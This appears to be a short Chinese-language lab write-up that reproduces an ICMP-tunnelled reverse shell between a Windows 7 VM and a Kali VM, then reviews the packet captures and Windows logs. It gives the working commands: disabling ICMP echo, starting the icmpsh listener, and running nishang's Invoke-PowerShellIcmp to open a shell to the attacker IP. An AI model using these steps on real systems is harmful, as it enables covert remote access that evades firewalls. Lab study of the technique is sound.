ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。
攻击过程复现。
复现环境
win7:192.168.0.73。powershell导入nishang框架。 https://blog.csdn.net/weixin_44253823/article/details/102972355
kali:192.168.0.162。安装icmpsh工具。 https://github.com/inquisb/icmpsh.git
进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显。
输入命令 ./icmpsh_m.py 192.168.0.162 192.168.0.73来启动监听,同时打开wireshark抓包。
在win7中打开powershell并导入nishang框架。
输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.162并执行。
在kali中拿到shell。
由于在桥接模式下,wireshark抓取到数据过多。因此改为net模式,在net模式下继续实验。
win7IP:192.168.131.135
kali IP:192.168.131.145
从报文可以看出数据通过ICMP协议传输,并且可以看到命令执行。
对windows日志进行查看,发现powershell程序进程。
拿到shell有进行文件夹创建工作,查找aaa可以发现创建用户以及时间。